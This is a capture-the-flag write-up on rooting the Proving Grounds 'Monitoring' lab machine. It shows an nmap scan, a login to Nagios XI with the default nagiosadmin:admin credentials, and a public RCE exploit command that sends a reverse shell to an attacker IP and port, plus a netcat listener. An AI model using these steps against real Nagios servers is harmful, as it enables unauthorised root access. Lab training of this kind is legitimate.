Monitoring

Introduction

This write-up details the steps taken to solve the Monitoring machine from Proving Grounds Play. The approach includes reconnaissance, enumeration and exploitation to gain root access.

Reconnaissance

I began with a full port scan using nmap to identify services and their versions:

nmap -sCV -p- 192.168.207.136

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
|   256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_  256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after:  2030-09-06T17:59:00
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after:  2030-09-06T18:28:08
5667/tcp open  tcpwrapped
Service Info: Host:  ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

Enumeration

Port 80

During the initial enumeration phase, I discovered an exposed web service running on port 80. Upon further investigation, it was identified as a Nagios XI login page.

Since no credentials were available initially, I attempted to authenticate using default credentials commonly associated with Nagios installations. The default combination nagiosadmin:admin was successful, granting access to the Nagios web interface. This immediately indicated potential misconfigurations that could be leveraged further for exploitation with the version 5.6.0

Explotation

It is using nagios 5.6.0, so let's check for vulnerabilities for this version. A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root. The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.

The publicly available exploit can be found here: Exploit-DB: https://www.exploit-db.com/exploits/47299

However, executing this exploit resulted in errors. As an alternative, I used another public exploit: GitHub: https://github.com/jakgibb/nagiosxi-root-rce-ex

To execute the attack, I used the following command:

php exploit.php --host=192.168.207.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.45.191 --reverseport=4444

Before executing the exploit, a Netcat listener was started to capture the reverse shell:

nc -nvlp 4444

Once the exploit successfully executed, a reverse shell as the root user was obtained: